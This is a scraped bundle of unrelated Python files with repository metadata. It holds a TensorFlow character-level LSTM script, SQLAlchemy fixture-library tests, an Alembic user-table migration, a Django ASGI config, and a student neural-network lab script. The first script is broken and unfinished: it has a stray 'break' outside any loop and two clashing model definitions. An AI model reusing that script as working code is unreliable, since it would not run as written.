import numpy as np import tensorflow as tf print("Setup") filename = './wonderland.txt' data = open(filename, 'r').read() unique_chars = list(set(data)) no_unique_chars = len(unique_chars) num_to_char = {i:char for i, char in enumerate(unique_chars)} char_to_num = {char:i for i, char in enumerate(unique_chars)} no_of_features = no_unique_chars length_of_sequence = 100 no_of_hidden = 700 no_of_layers = 10 generate_text_length = 100 print_per = 1 no_of_epochs = 5 pkeep=0.8 batch_size = 1 no_of_sequences = int(len(data)/length_of_sequence) print("no of sequences: {}".format( no_of_sequences)) X = np.zeros((int(len(data)/length_of_sequence), length_of_sequence, no_of_features)) Y = np.zeros((int(len(data)/length_of_sequence), length_of_sequence, no_of_features)) # data generation print("Data Generation") for i in range(0, int(len(data)/length_of_sequence)): X_sequence = data[i*length_of_sequence:(i+1)*length_of_sequence] X_sequence_in_num = [char_to_num[char] for char in X_sequence] input_sequence = np.zeros((length_of_sequence, no_of_features)) for j in range(length_of_sequence): input_sequence[j][X_sequence_in_num[j]] = 1 X[i] = input_sequence Y_sequence = data[i*length_of_sequence+1:(i+1)*length_of_sequence+1] Y_sequence_in_num = [char_to_num[char] for char in Y_sequence] output_sequence = np.zeros((length_of_sequence, no_of_features)) for j in range(length_of_sequence): output_sequence[j][Y_sequence_in_num[j]] = 1 Y[i] = output_sequence # create model print("Creating Model") batchX_placeholder = tf.placeholder(tf.int32, [batch_size, no_of_sequences, no_of_features], name='X') batchY_placeholder = tf.placeholder(tf.int32, [batch_size, no_of_sequences, no_of_features], name ='Y') Hin = tf.placeholder(tf.float32, [None, no_of_hidden*no_of_layers], name='Hin') cells = [tf.nn.rnn_cell.BasicLSTMCell(int(no_of_hidden/2), state_is_tuple=False) for _ in range(no_of_layers)] dropcells = [tf.nn.rnn_cell.DropoutWrapper(cell,input_keep_prob=pkeep) for cell in cells] multicell = tf.nn.rnn_cell.MultiRNNCell(dropcells, state_is_tuple=False) multicell = tf.nn.rnn_cell.DropoutWrapper(multicell, output_keep_prob=pkeep) Yr, H = tf.nn.dynamic_rnn(multicell, tf.to_float(batchX_placeholder), dtype=tf.float32, initial_state=Hin) Yflat = tf.reshape(Yr, [-1, int(no_of_hidden/2)]) Ylogits = tf.contrib.layers.linear(Yflat, no_of_features) # https://github.com/martin-gorner/tensorflow-rnn-shakespeare/blob/master/rnn_train.py break W = tf.get_variable("W", [no_of_hidden, no_of_features]) b = tf.get_variable("b", [no_of_features]) embedding = tf.get_variable("embedding", [no_of_features, no_of_hidden]) inputs = tf.nn.embedding_lookup(embedding, batchX_placeholder) init_state_placeholder = tf.nn.rnn_cell.BasicLSTMCell.zero_state(batch_size, tf.float32) state_per_layer_list = tf.unstack(init_state_placeholder, axis=0) rnn_tuple_state = tuple( [tf.nn.rnn_cell.LSTMStateTuple(state_per_layer_list[idx][0], state_per_layer_list[idx][1]) for idx in range(no_of_layers)] ) W2 = tf.Variable(np.random.rand(no_of_hidden, no_of_features), dtype=tf.float32) b2 = tf.Variable(np.zeros((1, no_of_features)), dtype=tf.float32) inputs_series = tf.split(batchX_placeholder, 1) labels_series = tf.unstack(batchY_placeholder, axis=1) #tf.split(batchY_placeholder, 1) cell = tf.nn.rnn_cell.BasicLSTMCell(no_of_hidden, state_is_tuple=True) stacked_lstm = tf.contrib.rnn.MultiRNNCell( [ tf.contrib.rnn.BasicLSTMCell(no_of_hidden) for _ in range(no_of_layers) ] , state_is_tuple=True) states_series, current_state = tf.contrib.rnn.static_rnn(stacked_lstm, inputs_series, rnn_tuple_state) logits_series = [tf.matmul(state, W2) + b2 for state in states_series] prediction_series = [tf.nn.softmax(logits) for logits in logits_series] losses = [tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=labels) for logits, labels in zip(logits_series, labels_series)] total_loss = tf.reduce_mean(losses) train_step = tf.train.AdagradOptimizer(0.3).minimize(total_loss) def vector_to_letter(vector): return num_to_char[np.argmax(vector)] def letter_to_vector(letter): result = np.zeros(no_of_features) result[char_to_num[letter]] = 1 return result def generate_text(sess, generate_text_length): generated_num = np.random.randint(no_unique_chars) generated_char = num_to_char[generated_num] _current_state = np.zeros((no_of_layers, 2, 1, no_of_hidden)) input_vector = letter_to_vector(generated_char) for i in range(generate_text_length): print(vector_to_letter(input_vector), end="") _current_state, _prediction_series = sess.run( [current_state, prediction_series], feed_dict = { batchX_placeholder: [input_vector], init_state_placeholder: _current_state } ) input_vector = letter_to_vector(vector_to_letter(_prediction_series[0])) print("Run") sess = tf.Session() sess.run(tf.global_variables_initializer()) for epoch_idx in range(no_of_epochs): for sequence_idx in range(no_of_sequences): _current_state = np.zeros((no_of_layers, 2, 1, no_of_hidden)) input = X[sequence_idx] output = Y[sequence_idx] loss_list = [] for char_idx in range(len(input)): _total_loss, _train_step, _current_state, _prediction_series = sess.run( [total_loss, train_step, current_state, prediction_series], feed_dict = { batchX_placeholder: [input[char_idx]], batchY_placeholder: [output[char_idx]], init_state_placeholder: _current_state } ) #print(vector_to_letter(_prediction_series[0]), end="") #print("["+vector_to_letter(output[char_idx])+"]",end="") loss_list.append(_total_loss) if sequence_idx%print_per == 0: print("Epoch {}, Sequence {}, Total Loss {}".format(epoch_idx, sequence_idx, np.mean(loss_list))) saver = tf.train.Saver() save_path = saver.save(sess, "./model.ckpt") print("Model saved in %s" % save_path) #sess.close()
f6b4eed5733ebb43bff4396dafd7b8badc4164f9
ae2308622f2801e78ee4348fba2c650dcec5f340
/venv/lib/python3.6/site-packages/fixture/test/test_loadable/test_sqlalchemy_loadable.py
0205ba55df9162e695e503099931a26498e91e3a
[]
no_license
formika92/PyQtApp
425e49923312b35ef549ef58e8bf73361a54018d
460c6ba336fdb964d208585b3afab0d3ad829ea0
refs/heads/main
2023-08-01T05:33:29.130245
2021-09-12T13:22:50
2021-09-12T13:22:50
403,931,964
0
0
null
null
null
null
UTF-8
Python
false
false
18,698
py
import unittest from six import print_ from fixture.examples.db.sqlalchemy_examples import * from fixture.loadable.sqlalchemy_loadable import * from fixture.test import conf, env_supports from fixture.test.test_loadable import * def get_transactional_session(): if sa_major < 0.5: session = scoped_session( sessionmaker( autoflush=False, transactional=True, ), scopefunc=lambda:__name__ ) return session else: session = scoped_session( sessionmaker( autoflush=True, autocommit=False, ), scopefunc=lambda:__name__ ) return session def clear_session(session): """ This method has a different name from version 0.5 """ if sa_major < 0.5: session.clear() else: session.expunge_all() def save_session(session, object): """ This method has a different name from version 0.5 """ if sa_major < 0.5: session.save(object) else: session.add(object) def setup(): if not env_supports.sqlalchemy: raise SkipTest def teardown(): pass @raises(UninitializedError) def test_cannot_teardown_unloaded_fixture(): class CategoryData(DataSet): class cars: name = 'cars' engine = create_engine(conf.LITE_DSN) metadata.bind = engine db = SQLAlchemyFixture( env=globals(), engine=metadata.bind ) data = db.data(CategoryData) data.teardown() @attr(unit=1) def test_negotiated_medium(): class CategoryData(DataSet): class cars: name = 'cars' engine = create_engine(conf.LITE_DSN) metadata.bind = engine metadata.create_all() eq_(type(negotiated_medium(categories, CategoryData)), TableMedium) eq_(is_table(categories), True) clear_mappers() mapper(Category, categories) eq_(type(negotiated_medium(Category, CategoryData)), MappedClassMedium) eq_(is_mapped_class(Category), True) # hmmm # eq_(is_assigned_mapper(Category), False) clear_mappers() ScopedSession = scoped_session(get_transactional_session()) ScopedSession.mapper(Category, categories) eq_(type(negotiated_medium(Category, CategoryData)), MappedClassMedium) eq_(is_mapped_class(Category), True) eq_(is_assigned_mapper(Category), True) @attr(unit=1) def test_negotiated_medium_05(): if sa_major < 0.5: raise SkipTest("Requires SQLAlchemy >= 0.5") class FooData(DataSet): class foo: name = 'foozilator' from sqlalchemy.ext.declarative import declarative_base Base = declarative_base() engine = create_engine(conf.LITE_DSN) class DeclarativeFoo(Base): __tablename__ = 'fixture_declarative_foo' id = Column(Integer, primary_key=True) name = Column(String) DeclarativeFoo.metadata.bind = engine DeclarativeFoo.__table__.create() try: eq_(type(negotiated_medium(DeclarativeFoo, FooData)), MappedClassMedium) finally: DeclarativeFoo.__table__.drop() class TestSetupTeardown(unittest.TestCase): class CategoryData(DataSet): class cars: name = 'cars' class free_stuff: name = 'get free stuff' def setUp(self): engine = create_engine(conf.LITE_DSN) metadata.bind = engine metadata.create_all() Session = get_transactional_session() self.session = Session() self.fixture = SQLAlchemyFixture( env={'CategoryData':Category}, engine=metadata.bind ) clear_mappers() mapper(Category, categories) def tearDown(self): metadata.drop_all() self.session.close() @attr(functional=1) def test_setup_then_teardown(self): eq_(self.session.query(Category).all(), []) data = self.fixture.data(self.CategoryData) data.setup() clear_session(self.session) cats = self.session.query(Category).order_by('name').all() eq_(cats[0].name, 'cars') eq_(cats[1].name, 'get free stuff') data.teardown() clear_session(self.session) eq_(list(self.session.query(Category)), []) class TestImplicitSABinding(unittest.TestCase): class CategoryData(DataSet): class cars: name = 'cars' class free_stuff: name = 'get free stuff' def setUp(self): engine = create_engine(conf.LITE_DSN) metadata.bind = engine # metadata.bind.echo = True metadata.create_all() Session = get_transactional_session() self.session = Session() # note the lack of explicit binding : self.fixture = SQLAlchemyFixture( env={'CategoryData':Category}, ) clear_mappers() # since categories is assigned to metadata, SA should handle binding for us mapper(Category, categories) def tearDown(self): # metadata.bind.echo = False metadata.drop_all() self.session.close() @attr(functional=1) def test_setup_then_teardown(self): eq_(self.session.query(Category).all(), []) data = self.fixture.data(self.CategoryData) data.setup() clear_session(self.session) cats = self.session.query(Category).order_by('name').all() eq_(cats[0].name, 'cars') eq_(cats[1].name, 'get free stuff') data.teardown() clear_session(self.session) eq_(list(self.session.query(Category)), []) class CategoryData(DataSet): class cars: name = 'cars' class free_stuff: name = 'get free stuff' class ProductData(DataSet): class truck: name = 'truck' category = CategoryData.cars class OfferData(DataSet): class free_truck: name = "it's a free truck" product = ProductData.truck category = CategoryData.free_stuff class free_spaceship(free_truck): id = 99 name = "it's a free spaceship" class free_tv(free_spaceship): name = "it's a free TV" class TestCascadingReferences(unittest.TestCase): CategoryData = CategoryData ProductData = ProductData OfferData = OfferData def setUp(self): if not conf.HEAVY_DSN: raise SkipTest("conf.HEAVY_DSN not defined") engine = create_engine(conf.HEAVY_DSN) metadata.bind = engine metadata.create_all() Session = get_transactional_session() self.session = Session() self.fixture = SQLAlchemyFixture( env=globals(), engine=metadata.bind, style=NamedDataStyle(), ) clear_mappers() mapper(Category, categories) mapper(Product, products, properties={ 'category': relation(Category, backref='products') }) mapper(Offer, offers, properties={ 'product': relation(Product, backref='offers'), 'category': relation(Category, backref='offers') }) def tearDown(self): metadata.drop_all() self.session.close() clear_mappers() # self.conn.close() metadata.bind.dispose() @attr(functional=1) def test_setup_then_teardown(self): eq_(self.session.query(Category).all(), []) eq_(self.session.query(Product).all(), []) eq_(self.session.query(Offer).all(), []) data = self.fixture.data(self.OfferData) data.setup() clear_session(self.session) cats = self.session.query(Category).order_by('name').all() eq_(cats[0].name, 'cars') eq_(cats[1].name, 'get free stuff') prods = self.session.query(Product).order_by('name').all() eq_(prods[0].name, 'truck') eq_(prods[0].category, cats[0]) off = self.session.query(Offer).order_by('name').all() eq_(off[0].name, "it's a free TV") eq_(off[0].product, prods[0]) eq_(off[0].category, cats[1]) eq_(off[1].name, "it's a free spaceship") eq_(off[1].product, prods[0]) eq_(off[1].category, cats[1]) eq_(off[2].name, "it's a free truck") eq_(off[2].product, prods[0]) eq_(off[2].category, cats[1]) data.teardown() clear_session(self.session) eq_(self.session.query(Category).all(), []) eq_(self.session.query(Product).all(), []) eq_(self.session.query(Offer).all(), []) class TestCollidingSessions(unittest.TestCase): class CategoryData(DataSet): class cars: name = 'cars' class free_stuff: name = 'get free stuff' def setUp(self): self.engine = create_engine(conf.LITE_DSN) # self.conn = self.engine.connect() metadata.bind = self.engine # metadata.bind.echo = True metadata.create_all() # metadata.bind.echo = False self.ScopedSession = scoped_session(get_transactional_session()) self.session = self.ScopedSession() self.fixture = SQLAlchemyFixture( env={'CategoryData':Category}, engine=metadata.bind ) clear_mappers() mapper(Category, categories) def tearDown(self): metadata.drop_all() self.session.close() @attr(functional=1) def test_setup_then_teardown(self): eq_(self.session.query(Category).all(), []) data = self.fixture.data(self.CategoryData) data.setup() clear_session(self.session) cats = self.session.query(Category).order_by('name').all() eq_(cats[0].name, 'cars') eq_(cats[1].name, 'get free stuff') # simulate the application running into some kind of error: new_cat = Category() new_cat.name = "doomed to non-existance" save_session(self.session, new_cat) self.session.rollback() self.ScopedSession.remove() data.teardown() clear_session(self.session) print_([(c.id, c.name) for c in self.session.query(Category).all()]) eq_(list(self.session.query(Category)), []) class TestScopedSessions(unittest.TestCase): class CategoryData(DataSet): class cars: name = 'cars' class free_stuff: name = 'get free stuff' def setUp(self): self.engine = create_engine(conf.LITE_DSN) metadata.bind = self.engine metadata.create_all() ScopedSession = scoped_session(get_transactional_session()) self.session = ScopedSession() self.fixture = SQLAlchemyFixture( env={'CategoryData':Category}, engine=metadata.bind ) clear_mappers() mapper(Category, categories) def tearDown(self): metadata.drop_all() self.session.close() @attr(functional=1) def test_setup_then_teardown(self): eq_(self.session.query(Category).all(), []) data = self.fixture.data(self.CategoryData) data.setup() clear_session(self.session) cats = self.session.query(Category).order_by('name').all() eq_(cats[0].name, 'cars') eq_(cats[1].name, 'get free stuff') data.teardown() clear_session(self.session) eq_(list(self.session.query(Category)), []) class TestElixir(unittest.TestCase): class CategoryData(DataSet): class cars: name = 'cars' class free_stuff: name = 'get free stuff' def setUp(self): if not env_supports.elixir: raise SkipTest("elixir module not found") import elixir self.engine = create_engine(conf.LITE_DSN) metadata.bind = self.engine metadata.create_all() class CategoryEntity(elixir.Entity): elixir.using_options(tablename=str(categories)) # save_on_init IS VERY IMPORTANT elixir.using_mapper_options(save_on_init=False) self.CategoryEntity = CategoryEntity self.fixture = SQLAlchemyFixture( env={'CategoryData':CategoryEntity}, engine=metadata.bind ) elixir.metadata.bind = self.engine elixir.setup_all() def tearDown(self): metadata.drop_all() @attr(functional=1) def test_setup_then_teardown(self): try: from elixir import session as elixir_session except ImportError: from elixir import objectstore as elixir_session eq_(len(elixir_session.query(self.CategoryEntity).all()), 0) data = self.fixture.data(self.CategoryData) data.setup() eq_(len(elixir_session.query(self.CategoryEntity).all()), 2) data.teardown() eq_(elixir_session.query(self.CategoryEntity).all(), []) class TestTableObjects(unittest.TestCase): class CategoryData(DataSet): class cars: name = 'cars' class free_stuff: name = 'get free stuff' def setUp(self): self.engine = create_engine(conf.LITE_DSN) metadata.bind = self.engine metadata.create_all() Session = get_transactional_session() self.session = Session() self.fixture = SQLAlchemyFixture( # maps to a table object : env={'CategoryData':categories}, engine=metadata.bind ) clear_mappers() mapper(Category, categories) def tearDown(self): metadata.drop_all() self.session.close() @attr(functional=1) def test_setup_then_teardown(self): eq_(self.session.query(Category).all(), []) data = self.fixture.data(self.CategoryData) data.setup() clear_session(self.session) cats = self.session.execute(categories.select()).fetchall() eq_(cats[0].name, 'cars') eq_(cats[1].name, 'get free stuff') data.teardown() clear_session(self.session) eq_(self.session.execute(categories.select()).fetchall(), []) class TestTableObjectsExplicitConn(object): class CategoryData(DataSet): class cars: name = 'cars' class free_stuff: name = 'get free stuff' def setUp(self): if not conf.HEAVY_DSN: raise SkipTest("conf.HEAVY_DSN not defined") self.litemeta = MetaData(bind=conf.LITE_DSN) LiteSession = sessionmaker(bind=self.litemeta.bind) self.litesession = LiteSession() heavymeta = MetaData(bind=create_engine(conf.HEAVY_DSN)) HeavySession = sessionmaker(bind=heavymeta.bind) self.heavysession = HeavySession() # this creates the default bind: metadata.bind = heavymeta.bind metadata.create_all() # this creates the table in mem but does not bind # the connection to the table: categories.create(bind=self.litemeta.bind) clear_mappers() mapper(Category, categories) def tearDown(self): metadata.drop_all() def test_with_engine_connection(self): fixture = SQLAlchemyFixture( # maps to a table object : env={'CategoryData':categories}, # this should overwrite the default bind: engine = self.litemeta.bind ) data = fixture.data(CategoryData) data.setup() rs = self.heavysession.query(Category).all() assert rs==[], "unexpected records in HEAVY_DSN db: %s" % rs rs = self.litesession.query(Category).all() eq_(len(rs), 2) data.teardown() rs = self.litesession.query(Category).all() eq_(len(rs), 0) def test_fixture_can_be_disposed(): if sa_major < 0.5: from sqlalchemy.exceptions import InvalidRequestError else: from sqlalchemy.exc import InvalidRequestError engine = create_engine(conf.LITE_DSN) metadata.bind = engine metadata.create_all() Session = get_transactional_session() session = Session() fixture = SQLAlchemyFixture( env={'CategoryData':Category}, engine=metadata.bind ) class CategoryData(DataSet): class cars: name = 'cars' class free_stuff: name = 'get free stuff' clear_mappers() mapper(Category, categories) data = fixture.data(CategoryData) data.setup() data.teardown() fixture.dispose() # cannot use fixture anymore : try: data.setup() except InvalidRequestError: pass else: assert False, "data.setup() did not raise InvalidRequestError after connection was disposed" # a new instance of everything is needed : metadata.create_all() fixture = SQLAlchemyFixture( env={'CategoryData':Category}, engine=metadata.bind ) data = fixture.data(CategoryData) data.setup() data.teardown() @attr(unit=True) def test_SQLAlchemyFixture_configured_with_bound_session_and_conn(): class StubConnection: def begin(self): pass stub_conn = StubConnection() class StubTransaction: def add(self, engine): pass fake_out_bind = 1 class StubSession: bind_to = fake_out_bind def create_transaction(self): return StubTransaction() stub_session = StubSession() f = SQLAlchemyFixture( session=stub_session, connection=stub_conn) f.begin() eq_(f.session, stub_session) eq_(f.connection, stub_conn) ### was using this to work around postgres deadlocks... # if dsn.startswith('postgres'): # # postgres will put everything in a transaction, even after a commit, # # and it seems that this makes it near impossible to drop tables after a test # # (deadlock), so let's fix that... # import psycopg2.extensions # self.conn.connection.connection.set_isolation_level( # psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)
fae323274d9df5df19c5909ba46c9c97b3b98cfc
afce5c1f6499ef73c91fcdffc8f75200bf3b71f7
/microblog/migrations/versions/45e73e1d8309_users_table.py
6e58a4e702813c1b8d29ed936149dbb7167180d6
[]
no_license
michaelzh17/flaskmega
e15d69f2d3856c157bbeafd10a1cf533f2354cd1
b2a3e6bd5bb7f24d93a79765904564f399166446
refs/heads/master
2022-12-09T20:42:21.377754
2018-11-05T16:10:17
2018-11-05T16:10:17
146,813,855
0
0
null
2022-12-08T02:59:04
2018-08-30T22:39:18
Python
UTF-8
Python
false
false
1,131
py
"""users table Revision ID: 45e73e1d8309 Revises: Create Date: 2018-09-18 12:01:15.130771 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = '45e73e1d8309' down_revision = None branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.create_table('user', sa.Column('id', sa.Integer(), nullable=False), sa.Column('username', sa.String(length=64), nullable=True), sa.Column('email', sa.String(length=120), nullable=True), sa.Column('password_hash', sa.String(length=128), nullable=True), sa.PrimaryKeyConstraint('id') ) op.create_index(op.f('ix_user_email'), 'user', ['email'], unique=True) op.create_index(op.f('ix_user_username'), 'user', ['username'], unique=True) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_index(op.f('ix_user_username'), table_name='user') op.drop_index(op.f('ix_user_email'), table_name='user') op.drop_table('user') # ### end Alembic commands ###
d0639903d08987691bc44256257a865b8c550fa8
c69764ddde1b5338101f2d10d6281eb513c0bc4e
/api_reader/asgi.py
63f39b670f0e8a457620a9d26e416c9abfb87421
[]
no_license
mentally-gamez-soft/trains-manager-app
b51d2caa98e58bb3e3e947cc7d7f1a378b554ec0
04e4e8dc7a5af96233ac4aa8568a77546d6e26d7
refs/heads/master
2023-03-21T02:19:04.779210
2021-03-15T20:12:35
2021-03-15T20:12:35
348,110,891
0
0
null
null
null
null
UTF-8
Python
false
false
397
py
""" ASGI config for api_reader project. It exposes the ASGI callable as a module-level variable named ``application``. For more information on this file, see https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/ """ import os from django.core.asgi import get_asgi_application os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'api_reader.settings') application = get_asgi_application()
4ce9c6dba4806b29f781d19a3fd908153c5b1fbc
83eabb30d0e3c826e02e9169c7bfa86458be5407
/reports/Krechko/5/src/lab_5_Krechko.py
9d6bc90e8f12180978814887429ff53fd06823e5
[]
no_license
kroschenko/miapr_po4_2020
1fdac30f84a3110f70b45352208eb15eb1e3824f
353314f2372735006e98720381e54a3fcffb54ae
refs/heads/master
2023-02-07T14:27:40.295206
2020-12-24T16:27:10
2020-12-24T16:27:10
295,746,775
1
44
null
2020-12-27T12:15:17
2020-09-15T14:02:51
Jupyter Notebook
UTF-8
Python
false
false
6,112
py
import numpy as np def sigmoid(x): return np.tanh(x) def dsigmoid(x): return 1 - (sigmoid(x) ** 2) # Среднеквадратична ошибка def error(y,Y): yy = y.ravel() YY = Y.ravel() return np.mean((yy.reshape(1,len(yy)) - YY.reshape(1,len(YY))) ** 2) def adaptive(errors,outputs,inputs): return np.divide(np.sum(np.dot(np.square(errors),np.subtract(1,np.square(outputs)))),np.multiply(np.add(1,np.sum(np.square(inputs))),np.sum(np.dot(np.square(errors),np.square(np.subtract(1,np.square(outputs))))))) def training(inputs,predict,weights_hidden,weights_input,learning_rate): # Выход скрытого слоя inputs_hidden = np.dot(weights_hidden,inputs) outputs_hidden = sigmoid_mapper(inputs_hidden) # Выход выходного слоя inputs_input = np.dot(weights_input,outputs_hidden) outputs_input = sigmoid_mapper(inputs_input) # Ошибка выходного слоя error_input = np.subtract(outputs_input,predict) # Градиент выходного слоя gradient_input = dsigmoid(outputs_input) delta_input = error_input * gradient_input for w,d in zip(weights_input,delta_input): # Корректируем выходные веса ww, dd = [], [] ww = w.reshape(1,len(w)) dd.append(d) ww -= learning_rate * np.dot(dd,outputs_hidden.reshape(1,len(outputs_hidden))) for w,d in zip(weights_input,delta_input): # Ошибка скрытого слоя ww, dd = [], [] ww = w.reshape(1,len(w)) dd.append(d) error_hidden = dd * ww # Корректируем скрытые веса gradient_hidden = dsigmoid(outputs_hidden) delta_hidden = error_hidden * gradient_hidden weights_hidden -= learning_rate * np.dot(inputs.reshape(len(inputs),1),delta_hidden).T return weights_hidden,weights_input,learning_rate def prediction(inputs,weights_hidden,weights_input): inputs_hidden = np.dot(weights_hidden,inputs) outputs_hidden = sigmoid_mapper(inputs_hidden) inputs_input = np.dot(weights_input,outputs_hidden) outputs_input = sigmoid_mapper(inputs_input) return outputs_input sigmoid_mapper = np.vectorize(sigmoid) learning = [] predictions = [] learning_rate = 0.5 epoch = 0 epoch_maximum = 15000 error_minimum = 1e-5 # минимальная ошибка n_input = 20 # количество входов n_hidden = 10 # количество элементов скрытого слоя n_output = 3 # количество выходов w_hidden = np.random.normal(0.0,2 ** -0.5,(n_hidden,n_input)) w_input = np.random.normal(0.0,1,(n_output,n_hidden)) vectors = np.array([[1,1,1,1,0,0,0,0,1,1,1,1,0,0,0,0,1,1,1,1], [1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0], [1,1,1,0,0,0,1,1,1,0,0,0,1,1,1,0,0,0,1,1]]) codes = np.array([[1,0,0],[0,1,0],[0,0,1]]) for vector, code in zip(vectors, codes): com = [] com.append(vector) com.append(code) learning.append(tuple(com)) while True: inputs, predicts = [], [] for sample,predict in learning: w_hidden,w_input,learning_rate = training(np.array(sample),np.array(predict),w_hidden,w_input,learning_rate) inputs.append(np.array(sample)) predicts.append(np.array(predict)) error_learning = error(prediction(np.array(inputs).T,w_hidden,w_input),np.array(predicts)) epoch += 1 if error_learning <= error_minimum or epoch > epoch_maximum: break print("\nРЕЗУЛЬТАТЫ ОБУЧЕНИЯ:") for sample,predict in learning: output = prediction(sample,w_hidden,w_input) print("прогноз : {:<30}\nожидаемый: {:<30}\n".format(str(output),str(np.array(predict)))) vvectors = np.array([[1,1,1,1,0,0,0,0,1,1,1,1,0,0,0,0,1,1,1,1], [1,1,1,0,0,0,0,0,1,1,1,1,0,0,0,0,1,1,1,0], [1,0,1,1,0,0,0,0,1,1,1,1,0,0,0,0,1,0,1,1], [1,1,1,1,0,0,0,0,1,1,0,1,0,0,0,0,1,1,1,1], [1,1,1,1,0,0,0,1,1,1,1,1,0,0,0,0,1,1,1,1]]) ccodes = np.array([[1,0,0],[1,0,0],[1,0,0],[1,0,0],[1,0,0]]) for vector, code in zip(vvectors, ccodes): com = [] com.append(vector) com.append(code) predictions.append(tuple(com)) print("\nРЕЗУЛЬТАТЫ ПРОГНОЗИРОВАНИЯ:") for sample,predict in predictions: output = prediction(sample,w_hidden,w_input) print("прогноз : {:<30}\nожидаемый: {:<30}\n".format(str(output),str(np.array(predict)))) predictions = [] vvectors = np.array([[1,0,1,0,1,0,1,0,1,1,1,0,1,0,1,0,1,0,1,0], [1,1,1,0,1,0,1,0,1,0,0,0,1,0,1,0,1,0,1,0], [1,0,1,0,1,0,1,0,1,0,1,1,1,0,1,0,1,0,0,0], [1,0,1,0,1,0,1,0,1,1,1,0,0,0,1,0,1,0,1,0], [1,0,1,0,1,0,1,0,0,0,1,0,1,1,1,0,1,0,1,0]]) ccodes = np.array([[0,1,0],[0,1,0],[0,1,0],[0,1,0],[0,1,0]]) for vector, code in zip(vvectors, ccodes): com = [] com.append(vector) com.append(code) predictions.append(tuple(com)) for sample,predict in predictions: output = prediction(sample,w_hidden,w_input) print("прогноз : {:<30}\nожидаемый: {:<30}\n".format(str(output),str(np.array(predict)))) predictions = [] vvectors = np.array([[1,1,1,0,1,0,1,1,1,0,0,0,1,1,1,0,0,0,1,1], [1,1,1,0,0,0,1,1,0,0,0,0,1,1,1,0,0,0,1,1], [1,1,1,0,0,0,1,1,1,0,1,0,1,1,1,0,0,0,1,1], [0,1,1,0,0,0,1,1,1,0,0,0,1,1,1,0,0,0,1,1], [1,1,1,0,0,0,1,1,1,0,0,1,1,1,1,0,0,0,1,1]]) ccodes = np.array([[0,0,1],[0,0,1],[0,0,1],[0,0,1],[0,0,1]]) for vector, code in zip(vvectors, ccodes): com = [] com.append(vector) com.append(code) predictions.append(tuple(com)) for sample,predict in predictions: output = prediction(sample,w_hidden,w_input) print("прогноз : {:<30}\nожидаемый: {:<30}\n".format(str(output),str(np.array(predict))))